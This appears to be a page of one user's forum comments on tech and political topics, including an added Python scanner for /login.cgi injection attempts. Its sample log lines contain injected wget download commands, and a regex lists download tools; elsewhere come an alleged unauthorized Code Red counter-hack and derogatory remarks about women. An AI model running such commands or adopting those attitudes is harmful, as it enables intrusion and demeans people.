Re: UI revamp
ugh, the WORST fat-finger-burger menu EVAR! [I am nauseated just thinking about it]
I've heard that term for years, often used in engineering circles to avoid more profane terms that mean the same thing. It deserves an actual technical definition, like 'CRUD'.
In the nuclear industry, CRUD is officially "Corrosion and wear byproducts in a nuclear reactor system that have become radioactive and are deposited and accumulated in related equipment". 'CRUD traps' are places where it accumulates the most, and they often get signs posted on them indicating the last measured radiation dosage rate. Some are so bad they get lead shielding wrapped around them so that you can spend more than 5 minutes nearby when working on stuff, without exceeding your radiation limits at any rate. But yeah it's the side effect of neutron-irradiating Iron 59 which turns it into Cobalt 60. CRUD.
I suppose CRUFT could officially become "any bloatware or overly implemented feature that can easily be eliminated without adversely affecting the usability or functionality of a software application."
"There's someone in MS who knew very well what they were inflicting on the general public with the ribbon but they did it anyway."
That person no longer works at Micro-shaft. Maybe this is why it's starting to get a face lift? Same person responsible for ribbon AND "the metro" in case anyone wondered (see link), even though Sinofsky (allegedly) had taken the fall over 'the metro' and Windows 'Ape'.
Then again, "fixing" the ribbon (instead of completely obliterating it) is lipstick on a boar, but this time it IS on the oinky end.
unfortunately it seems nothing's been done about the 'izuku.sh' file, though my logs show different IP addresses hosting it now. Yeah, they ignored me. Well that server _IS_ in Poland... they probably can't read or understand the information properly and/or just ignore it because they regularly host criminal services or similar. [I've had 'confirmed kills' before, with responses, just not that often - usually it is silently fixed or seems so because the activity stops]. Another possibility is that they leave it on the server to see what IP addresses download it to track the thing. Well I won't interfere with law enforcement if that's the case.
( I also posted the actual URL on USENET, and described it even better there, so not like it's invisible any more, and anyone can see it in web server logs )
Back at the turn o' the century, Code Red lingered for several years after the initial infections started. Someone (allegedly me perhaps?) allegedly had an auto-responder that would allegedly shut down the Code Red infected web server remotely (since it was attempting to spread a virus) via the Code Red back door command/control channel and (allegedly) leave a file on the administrator desktop that said something like "you are an idiot" and explained why the web server was shut down remotely. Both of those factoids should frighten any clueless admin into patching the thing (as it was most likely some old unpatched "oh we have a web server running?" Win2k box in a closet that nobody thought about). But I digress...
Since June there have been a number of requests for '/login.cgi' in my web logs (several hundred) with an obvious code injection exploit in the URL, that wget's a file on a server with a specific IP address (several of these observed, looks like they change periodically) which then loads a binary image for MIPS or ARM processors [as appropriate] into /tmp or one of several other directories that it might be able to download something into...
in any case the script it first downloads is called 'izuku.sh' . I reported my logs and findings to several ISPs who either hosted the machines doing the request, or WERE the host for the downloading.
Not sure if this is the same one the article talks about, but the one I saw has been around since June (according to my logs) and always tries to download that script file which then attempts to download the binary into one of several directories, then load/run it. And I think if you disable remote management on your router, this (apparent) virus won't infect it. But it could be a different one, not the one the article is about. I don't know. So I mention it anyway, just in case. Details are sometimes useful...
Anyway, if you have a web server, look for access attempts for /login.cgi and you'll probably see it (the one I'm talking about). Again, dunno if it's the same as the one in the article, but is similar, probably.
(the first log entry is 15-June at 14:36, in case anybody wonders)
Let's say you do testing, and you discover a leak. You know it's "around here". The drawings say there shouldn't be a leak, but you have one anyway. So, to access the leaky zone, you drill a hole. THEN you inject some sealant goop into the hole, and the leak stops. YAY, you FIXED it! But it doesn't hold, and so now your hole is in a photograph blaming you.
less funny than the other explanations. I'll get my coat anyway for the buzz-kill effect.
A sub with a hole 'above the water line' so it's ok... uh, huh.
well I don't think sub builders [in this case, probably Electric Boat, or perhaps Mare Island] would be so brain-dead stupid as to actually do that. My guess is it's just a funny urban legend... or it may have been a hole that was drilled for some other reason (to attach sonar gear via a cable that penetrates the hull?), and someone was funnin' with the civilian. [yeah maybe the cable stuffing box hadn't been attached yet]
In reality sub hulls are thoroughly x-rayed and re-welded if any flaws are found. I was semi-involved in that process once, a long time ago. Standard practice for Navy ships at any rate.
And yeah, subscription pricing is next, right? (if I read the tail-end of the article correctly, it is)
Somehow I think a good old-fashioned "git pull", local edit, and "git push" would do better. There's already an editor of sorts for merging, and I'm not amused by it. It's kinda "piggy" and not impressive in the least.
But I suppose it *could* get worse.
/me thinks: just because you CAN does not mean you SHOULD.
the cloud would work better if Micro-shaft could write EFFICIENT CODE like they USED to.
Compare ".Net" and "UWP" to how snappy Win '95 was, by comparison. In 16Mb of memory even!!!
And that pretty much explains it all. Micro-shaft, STOP it with the BLOATWARE! Abandon ".Not", "UWP", "The Metro", C-pound, and THE SPYWARE!!! [then you might find your servers won't overheat because they're no longer working against themselves, ya know???]
MS fanboi downvotes welcome. heh. But, you *KNOW* I'm *RIGHT* about this!!!
using a git repo for web-side code that [at one time] had keys or other information embedded in it [think something similar to Django 'template' files, where server-side code could be embedded in the actual pages themselves, or more specifically what .git has in it] could, in a misconfigured system, reveal the '.git' directory and allow it to be downloaded. And if you don't have the keys embedded in it NOW, maybe they were there 'for testing' in any version of the code EVAR, and that's the security hole [in this case].
I am pretty sure Django's default implementation doesn't allow access to '.git' directories. However, if you bring it up in 'debug' mode, or allow 'generic' file downloading on ANYTHING, it just might...
[there are many reasons I dislike Django, easy to misconfigure due to its overall confusing nature being one of them]
Some additional experiments (by me) showed that default apache will serve up those '.git' directories unless you tell it NOT to. I created one for grins (as a symlink) and re-directed it to "the usual place" along with all of those other things that crackers and web viruses always want to test downloading. And after checking some web logs, I discovered that there's another bit of virus/malware out there looking for '/login.cgi' and apparently attempting to inject a wget command to download something from a rogue server at an IP address that I shouldn't mention here. If you want that IP address, check your web logs. It's probably there. It's also pretty recent.
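An added example, not part of the original comments: one way to run the web-log check described in the posts about `/login.cgi` requests and exposed `.git` directories. It assumes Apache combined-format access logs; the sample lines, the `x=` parameter name and every address (documentation ranges) are constructed.

```python
"""Scan an access log for /login.cgi download-injection attempts and .git fetches."""
import re
from collections import Counter
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed sample in Apache "combined" format. Addresses are documentation
# ranges; the "x=" parameter name is a placeholder, not a real device parameter.
SAMPLE_LOG = """\
198.51.100.23 - - [02/Jul/2018:09:12:44 +0000] "GET /login.cgi?x=a%27;wget%20http://203.0.113.5/izuku.sh HTTP/1.1" 404 196 "-" "-"
198.51.100.77 - - [02/Jul/2018:11:40:03 +0000] "GET /login.cgi?x=a%27%3Bwget+http%3A%2F%2F203.0.113.9%2Fizuku.sh HTTP/1.1" 404 196 "-" "-"
198.51.100.23 - - [03/Jul/2018:01:05:19 +0000] "GET /login.cgi?x=a%27;wget%20http://203.0.113.5/izuku.sh HTTP/1.1" 404 196 "-" "-"
192.0.2.14 - - [03/Jul/2018:08:00:00 +0000] "GET /login.cgi HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.50 - - [03/Jul/2018:08:01:10 +0000] "GET /.git/config HTTP/1.1" 200 274 "-" "curl/7.58.0"
192.0.2.50 - - [03/Jul/2018:08:01:11 +0000] "GET /.git/HEAD HTTP/1.1" 403 199 "-" "curl/7.58.0"
192.0.2.14 - - [03/Jul/2018:08:02:30 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A shell separator followed by a download tool, checked AFTER URL-decoding.
FETCH_RE = re.compile(r'(?:;|\||`|&&|\$\()\s*(?:wget|curl|tftp)\b', re.I)
URL_RE = re.compile(r'https?://[^\s;\'"|`<>]+', re.I)
GIT_RE = re.compile(r'(?:^|/)\.git(?:/|$)')


def scan(log_text):
    """Return who sent injection attempts, which hosts served the payload,
    and which .git paths the server actually handed out."""
    report = {
        "injection_clients": Counter(),  # source address -> attempts
        "payload_hosts": Counter(),      # host in the injected URL -> mentions
        "git_probed": 0,                 # requests touching a .git path
        "git_served": [],                # (client, path) answered with content
    }
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path, _, query = m["target"].partition("?")
        path = unquote(path)
        status = int(m["status"])

        if path.endswith("/login.cgi"):
            decoded = unquote_plus(query)  # %3B, %20 and '+' hide the command
            if FETCH_RE.search(decoded):
                report["injection_clients"][m["client"]] += 1
                for url in URL_RE.findall(decoded):
                    host = urlsplit(url).hostname
                    if host:
                        report["payload_hosts"][host] += 1

        if GIT_RE.search(path):
            report["git_probed"] += 1
            if status in (200, 206):  # content was returned: repo is exposed
                report["git_served"].append((m["client"], path))
    return report


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for key, value in result.items():
        print(f"{key}: {dict(value) if isinstance(value, Counter) else value}")
```

The payload-host counter is what shows the hosting address changing over time; any entry in `git_served` means the web server returned repository files and the path needs to be denied in the server configuration.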
Just to add a little physics here...
The problem I see with eddy currents 'kick starting' a reaction in the white dwarf is that the sudden addition of reactivity [i.e. the gravitational compression] is *ALSO* likely to cause an uncontrolled reaction and *EXPLOSION* rather than a 'kick start' of the star.
Fusion and fission share a few similar *kinds* of parameters, reactivity being one of them. In the case of fusion, a major part of the reactivity consists of heat and density. The fusion reaction in a star is stable because the expansion force from the fusion reaction is balanced by gravity. Too much of one, the star goes 'boom', or collapses onto itself and goes out.
I would expect that because one fusion leads to another, you'd have a lifecycle time, delaying effects, and 'reactivity' (related to the effective neutron multiplication factor for fission; for fusion, it would be related to the ability of the energy from one fusion reaction to trigger others). When you have a sudden increase in reactivity, it's likely in a fusion reaction (as it is in a fission reaction) that you get a sudden 'jump' in the reaction rate that's somewhat proportional to the reactivity addition rate (this would be due to various factors that would be common in the reactivity equations of both fusion and fission). When the power levels of a nuclear reactor are unstable [a lot of chaotic activity, like a shut down fission reactor or a 'brown dwarf' star] then sudden spikes in the reaction rate might trigger an unknowable "super power level surge", high enough to explode instead of 'just starting up'. Or not.
The SL-1 incident (see https://en.wikipedia.org/wiki/SL-1 ) was a case where a shut down fission reactor went 'prompt critical' due to sudden reactivity addition, and experienced a 'prompt jump' in power levels (followed by 'prompt criticality' where power multiplied in microseconds instead of 100's of milliseconds) from a shut down condition to a 'thousands times maximum' power level (20GW according to the article, in a 3MW reactor) in a few milliseconds, burned nearly ALL of the nuclear fuel in that time period, and caused a 'water hammer' when all of the cooling water covering the core suddenly flashed to steam and pushed the remaining water up like a big piston, faster than you can blink, forcing the reactor vessel and attached components to jump 9 feet into the air, etc. etc. very very bad contamination, core meltdown, dead people, yotta yotta. Yuck. Photo of what was left of the melted/sploded core on the web page.
Assuming that sudden dwarf star restarts might act *like* *that*, because of the addition of reactivity by tidal forces and other 'black hole' things, if it's too quick, dwarf star go *BOOM*. My opinion.
"I making a point of immediately binning any CVs submitted as a .odt file"
That's why smart people submit PDFs instead, to get past the H.R. weenies and middle managers who think 'that way'.
Besides, who'd *WANT* to work for a snooty anal-retentive person that throws out a resumé simply because it's in an open source format? Or, worse, a company that HIRES such people in the H.R. department? [H.R. is the worst part of working on-site for any medium to large company - it's like they live to justify their own existence or something, nearly as bad as OUTSOURCED H.R.]
Fortunately, at this time, it's a "seller's market" (edit, I'd said 'buyer' but it's really 'seller') for employment opportunities, at least in the USA. It's pretty 'great'. [yeah I _did_ mean that, actually] So go ahead and toss my resumé so I don't hear back from ya!
FYI - 'goto' is a legitimate way to program although it should be used (mostly) for things *like* error cleanup [see lots of Linux kernel modules for examples - 'error_exit' and similar labels].
In the world of userland-only coding, you can afford to be snobby about 'never use goto'. In the kernel world, you use it because it works better. Just pointing that one out, for those who don't know.
"After all few Windows-only Software actually uses anything that came out after 2000."
I wish this were true. Unfortunately, some *EXTREMELY* unwise software developers (for business applications) drank the Micro-shaft coolaid and either use C-pound, or (nearly as bad) ".Not" with C++.
If the application you use falls into this category, you're *B0NED*.
However, if the developers were SMART, they used Java [Oracle does this] or MFC/C++ *without* ".Not" and targeted XP or 7 [and not 10]. Yes, it's STILL possible to do that. And very, very wise.
/me points out that with a little effort, MFC applications can be modified to use wxWidgets to run on Mac or X11 systems. There's effort for sure, but it's not "that much" and worth doing. Then you can have a single code base for everything. Yes, _I_ do this.
Once business applications are commonly available for Linux and Mac, people will *STOP* "needing" Windows, and developers will have even MORE reason to make their applications run on non-windows OSs.
"and even though I have complete confidence in my own ability to get it right, I also know how much of my time it would take to be certain that I got it right"
blah blah blah - sorry, I don't accept the *kinds* of statements that I would consider *toxic*. They are similar to:
"other, smarter people" "it's too difficult" "other people have tried and failed" "it will never work" "you don't have the skill set" "re-inventing the wheel" "wasting your time" "use what already exists" "it's been done before" "it's never been done before" ... on, and on, and on, the negativity, so negative!
How about something encouraging like: "Well, when it comes time to check your algorithm, make sure that [short description of mathematical algorithm or procedural test] does [whatever result you should get for good encryption]"
Otherwise, it sounds like the usual negativity ninnies. Just sayin.
[and I'd be interested in what tests you WOULD recommend]
icon, because, I hear from negativity ninnies all of the time. It's irritating at the least. Why discourage those with enthusiasm? Instead, point them in a direction that's actually HELPFUL.
"good crypto is incredibly hard to do"
I wouldn't say 'incredibly hard', but the diligence of testing the algorithm for actual cryptographic strength would be a part of that, yeah.
I wrote an encryption algorithm a couple o' decades ago. It was in protest of the 128-bit vs 60-bit "exportable" encryption nonsense, which was finally overturned a year or so later.
I described it in prose on a web site (kinda like PGP) just to make a point. It used a 256-bit key and a CRC algorithm at its core with a moving window that involved the encrypted data, not the 'dry' data, and was hyper-efficient on encrypting very large data files. Downside, required building a 128kbyte translation table which took a second or two on those old machines. I also encrypted the source file and published the binary, DARING anyone to de-crypt it. I used to get a lot of hits on that page, too (a hundred or so a month) and no takers on decrypting the source file. I forget what key I used to encrypt it. heh.
Turing is a VERY interesting example of what gummints could (and maybe WILL) do once the "need" for an individual has passed. Turing was needed to win the war. Turing was also on someone's "undesirable" list. He wasn't hurting anyone, but for some reason he NOW 'lost favor' and was quite effectively mistreated.
It is an example of "politics of the day" and those who do not conform to it, at the whim of those who wield power without accountability. Turing was a homosexual, and for some reason in the 1950's that suddenly became a problem (when it apparently wasn't in the 1940's because we needed him to decode Enigma and other coded messages). Turing should've gotten more respect. I have to wonder whose corn flakes he urinated in to suddenly cause "that" to happen...
The entire concept of free speech is really about POLITICAL speech, particularly speech that 'those in power' don't want to hear. "Political Correctness" fascists seek to SILENCE those they don't agree with, including corporations like Google and Facebook, as evidenced by how 'Diamond and Silk' have been treated (among other things).
And if you're law enforcement, and you look at someone's life for long enough, silently decrypting their files and data traffic and online history and so forth, until you find something 'questionable', you WILL find it eventually, ESPECIALLY when you have the unlimited resources of the U.S. Federal government and a _WILLING_ Department of "Justice" helping 'them' along and covering up the "2-tier'd justice system" abuses. You know, one justice for THEM, and another for YOU. That's a 2-tier'd justice system.
We do NOT need back doors to our encrypted data, giving unscrupulous power abusing law enforcement and government spies the keys to our lives. It's too easy to abuse in a digital world, which is why people use the encryption in the FIRST place. It's not so much what they WILL do, more like what they COULD do, or THREATEN to do to you, leaving you always looking over your shoulder, justifiably paranoid, of being somehow caught in a 'Perjury Trap' by the F.B.I. when you thought you were telling the TRUTH...
And WHO wants to live like _THAT_ ??? I'd rather be *FREE*.
A mandatory back door to encryption just opens wide for fishing expeditions and criminals who somehow get the key.
Yeah, THAT never happens [recent news stories regarding _serious_ FBI corruption at the highest levels and a 2-tier'd justice system notwithstanding, right?]
If "they" want to "find something" on you, and have a crypto back door AND unlimited funds and resources, they WILL find something. It can be ANYTHING, including a "process crime" for you "lying" to them. "I wasn't doing a self-pleasuring sex act to online pr0n!" "we have your webcam photographing you doing this with a time stamp and XXX minutes of video, courtesy of your encrypted file system with a back door". And so on. You lie to them about it, it violates the law 'making a false statement to a federal officer', and they JAIL YOU for it, or force you to plead "guilty" to some B.S. made-up "crime" instead...
because they CAN, and you happen to be on "their" radar. And they have the back door encryption keys, and they can fish for "illegal" activity whenever they please.
Yes. Reasons _NOT_ to allow this crap. Clear substantiated proven and undeniable evidence for this kind of abuse from top members of the DOJ in the U.S., and the methods they use to HARASS people into a conviction, is on the news, every night. No, not THAT news, the OTHER news...
ack on noscript, and also plugins that make all un-white-listed cookies temporary.
But... when will they FIX THE AUSTRALIS NONSENSE and GO BACK TO THE WAY IT WAS? you know, a UI with a MENU (and not a fat-finger-burger-button) at least by default, 3D SKEUOMORPHIC [like it USED to be, not all "chrome clone" looking] and WITHOUT the skinny black font and bright blue 2D "buttons" on a blisteringly white background 'options' screens...
'penny wise, pound foolish' I say.
paying extra to use a privacy service for the whois is pretty common, and a good idea if you personally register a domain. you don't want your home address and real name attached, right?
And so nothing really changed except that, with GDPR, it's theoretically possible to get the same level of service FOR FREE.
Let's do that in the USA too! I like it already.
In theory a registrar would need to have the real name/address and so they would know who to serve paperwork on for any kind of legal action.
That being said, ICANN could require registrars to cooperate with 'due process'. Fixed.
[it's probably like this already for the privacy services]
In the USA, you could do something _like_ an 'order to locate' in which you submit paperwork to a judge, in an 'ex parte' hearing (meaning you walk on in between cases) who then reviews the request and then signs or rejects it, most likely signing it if the case it applies to has any kind of merit. Then you serve paperwork after locating the entity/individual, sometimes involving law enforcement in the service, etc.
The registrar would simply have to honor the judge's order. But it's an extra step, probably doesn't really cost anything more than attorney fees for paperwork, and that will be significant enough for any legal action, so it's like *meh*.
IANAL disclaimer, YMMV, etc.
"It is funny how all of these supposedly creative people all come up with a look and feel for sites that is almost identical."
almost identically *CRAP* design, all 2D FLAT and BRIGHT BLUE ON BLINDING WHITE.
It's like who told these guys THAT was 'good design'? Like who told cashiers to put the coins ON TOP OF THE DOLLAR BILLS and then hand the pile to you... some dim-bulb pretending to be a consultant I guess. And that answers the OTHER question, too.
more likely, three colors. (at least for the actual web page, transcribed from a white board maybe)
One is light blue, for everything that's supposed to look like a button or a symbolic link.
Next, there is blisteringly blindingly bright white, for 90% of the page, to keep you from being able to see anything on it [like staring directly into the sun].
Then there's the black text, with a font size that is too small and a font weight that's too thin to be easily read without magnification, by anyone over the age of 35. Like this edit box, right here. Hint hint hint. Now, where's my magnifying glass... everything looks like "blur" on bright white here.
"Put some CSS, JQuery, or Ajax in there maybe the page could be
Fixed it for ya. Except CSS is ok when kept to a minimum [and not some ginormous boilerplate abomination from robot hell, stored on a CDN, and only used on THAT web page].
I can imagine how many horrible things gone horribly wrong will end up on 'teh intarwebs' as a result of an AI tool that turns drawings into web pages.
one step further, hard-to-guess user names that don't match e-mail names. It's an additional step that can prevent cracking your system, if the user names are also hard to guess.
'Jimmy1973' is too obvious. How about 'JMR.cor.bat.hor.sta' [a mild reference to "that comic" that I haven't seen mentioned yet, something about a horse saying "correct, that is a battery staple"]
and a few lines from the movie 'Hackers'... (from themoviequotes.com)
Eugene Belford: Someone didn't bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and...
Margo: [glares at The Plague]
Eugene Belford: god. So, would your holiness care to change her password?
wives from abroad... in some ways, as an American Male, this makes sense.
There is at least one web site out there dedicated to "no marriage" - without actually linking to it, which might force me to complete a captcha [difficult with scripting turned off].
In summary web sites like these contrast 'american feminist women' with women from outside of the US, suggesting that un-Americanized women make better wives. [there's a lot of truth to that; radical feminism has DESTROYED women, in my opinion, often turning them into queen-B man-hating B.I.itches, and who'd want to be married to one of THOSE women, but I digress...]
then why not BECOME "the rich CEO" yourself? [you lack the talent and drive and risk taking to do it? not MY problem! nor the problem of the CEOs that become "rich"]
Seriously, your particular argument sounds like it belongs at the last part of 'The Jungle'. [I had to read that for a class once - the last 1/3 of it is nothing but Communist propaganda from the 19th century]
Marx and Engels would be proud!
uh, the point of using plastic is to keep metal detectors from detecting it. [then again projectiles and casings are or have metal in them already, so it's just 'less detectable" with less metal in it]
so a metal printer would make "a firearm" and not "an undetectable firearm".
Since I can't think of an element or material that's both heavy AND solid enough to be a projectile, other than metals like lead or uranium, a plastic weapon that's totally undetectable is most likely going to be ineffective. You'd do better with a ceramic knife.
(pointing out that non-ferrous metal can be detected too, not just ferrous metal - put brass or other metal near a coil and its inductance changes, for example - eddy currents)
"You would expect the NRA to be screaming bloody murder, but they remain silent"
I think you misunderstand the NRA's position. It's mostly about the right to DEFEND YOURSELF using firearms. Plastic guns are more like 'skoff-law' weapons. The NRA wants you to be able to purchase, carry, and use a weapon that you legally purchase [one that is safe and won't explode when you try to use it].
It really has nothing to do with gun manufacturers, though it's likely that the gun manufacturers are members. But then again, in a capitalist society, someone will make money from selling things people want. I don't have a problem with that. Burdening the citizens' cost of ownership with excessive taxes, regulations, and 'ban-laws', I have a LOT of problems with THAT.
And yeah, it's reasonable to make it illegal [for a time, at least] for convicted felons to own/use firearms. Simply "being accused" should NEVER deprive you of your legally owned firearms, however.
(icon because an armed citizenry is difficult to manipulate and control - big brother is behind the bans)
selling drugs probably gets you jail time too. yet I bet it's easy to buy them, depending on where you go... (UK, USA, or anywhere for that matter)
[this is the classic libertarian 'making it illegal does not stop it' argument, yeah]
Don't forget the USA's experiment with prohibition. Not only did alcohol consumption continue, it became 'bad alcohol' consumption [home-made hooch with methanol and other poisons in it], and a great empowering of organized crime.
"I can download plans to make black powder rifles and pistols (I have made one of each).. I assume there's probably plans for semi-autos out there."
guns were invented about 1000 years or so ago in China, about the same time as gunpowder.
The Kentucky Long Rifle, one of the most accurate weapons in the mid 18th century, was hand-built by craftsmen without modern milling equipment. (wikipedia quotes someone as describing them being built with 'crude tools').
I think modern educated/trained engineers, machinists, and craftsmen are even smarter now [they won't have to go through as much trial/error to get some kind of success]. I see no obstacles to success here.
And you could simply hire a machinist to build certain parts for you, and make the rest out of plastic or wood or whatever in whatever design you like. "I want a hollow metal tube with a fracture toughness of XXX or more, capable of withstanding temperatures up to XXX, with several small grooves cut into the inside that slowly rotate their orientation from one end to the other." <-- rifled barrel
(and a firing pin isn't that big of a deal, really - yeah has to be strong so it doesn't bend, but still...)
Then you do experiments in a bunker-like enclosure to test the limits of your new rifle design, just like gun manufacturers would do. when you get a good one, mass produce!
So yeah who needs to rely on "illegally distributed" intarweb plans, when you can MAKE! YOUR! OWN! [with a little time in a regular old library studying up beforehand]
(pirate icon, because, obvious)
Biting the hand that feeds IT © 1998–2019